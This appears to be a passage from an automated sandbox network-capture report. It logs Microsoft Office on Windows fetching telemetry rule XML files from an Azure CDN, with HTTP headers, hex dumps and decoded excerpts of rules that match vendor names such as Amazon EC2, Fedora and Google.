                                                        x-azure-ref: 20241112T152707Z-15869dbbcc62nmdhhC1DFW2sxs00000006f0000000003am4
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:08 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.64979313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:08 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:08 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:08 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 479
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                        ETag: "0x8DC582BB7D702D0"
                                                        x-ms-request-id: fb68cf1d-a01e-001e-3b01-2d49ef000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152708Z-16547b76f7f4k79zhC1DFWu9y00000000fvg00000000cm4u
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:08 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.64979213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:08 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:08 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:08 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 425
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                        ETag: "0x8DC582BBA25094F"
                                                        x-ms-request-id: 3fd26caf-a01e-0032-3d02-2d1949000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152708Z-16547b76f7fdtmzhhC1DFW6zhc00000004rg000000008mfc
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:08 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.64979413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:08 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:08 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:08 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 475
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                        ETag: "0x8DC582BB2BE84FD"
                                                        x-ms-request-id: 32d5e889-e01e-0099-1f00-2dda8a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152708Z-16547b76f7f9rdn9hC1DFWfk7s0000000ft000000000dz4w
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:08 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.64979513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:08 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:08 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:08 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 448
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                        ETag: "0x8DC582BB389F49B"
                                                        x-ms-request-id: 215f87f6-c01e-0046-2c15-2d2db9000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152708Z-16547b76f7f7scqbhC1DFW0m5w0000000fmg00000000h1wc
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:08 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.64979713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:09 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:09 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:09 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 491
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                        ETag: "0x8DC582B98B88612"
                                                        x-ms-request-id: ac6bbd40-501e-007b-3e0c-2d5ba2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152709Z-16547b76f7fdtmzhhC1DFW6zhc00000004n000000000kemp
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:09 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.64979813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:09 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:09 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:09 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 416
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                        ETag: "0x8DC582BAEA4B445"
                                                        x-ms-request-id: 1e70bdcb-401e-0029-2301-2d9b43000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152709Z-16547b76f7fj897nhC1DFWdwq40000000fng00000000fg8p
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:09 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.64980013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:09 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:09 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 415
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                        ETag: "0x8DC582BA80D96A1"
                                                        x-ms-request-id: 22e74508-c01e-00a1-69a2-347e4a000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152709Z-15869dbbcc6tjwwhhC1DFWn228000000098g000000003vfc
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:10 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.64980113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:09 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:09 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 471
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                        ETag: "0x8DC582B97E6FCDD"
                                                        x-ms-request-id: 53ec7209-c01e-0046-37a2-342db9000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152709Z-17df447cdb54ntx4hC1DFW2k400000000cf0000000008dw1
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:10 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.64979913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:10 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:10 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 479
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                        ETag: "0x8DC582B989EE75B"
                                                        x-ms-request-id: a8f543db-f01e-003f-08a0-34d19d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152710Z-17df447cdb54ntx4hC1DFW2k400000000cn000000000215w
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:10 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.64980213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:10 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:10 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                        ETag: "0x8DC582B9C710B28"
                                                        x-ms-request-id: d07841a0-401e-0064-490f-2d54af000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152710Z-16547b76f7f7rtshhC1DFWrtqn0000000fvg00000000cn91
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        77192.168.2.64980313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:10 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:10 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 477
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                        ETag: "0x8DC582BA54DCC28"
                                                        x-ms-request-id: 4a1cb9ec-a01e-0021-5a00-2d814c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152710Z-16547b76f7f9rdn9hC1DFWfk7s0000000fv00000000090r7
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
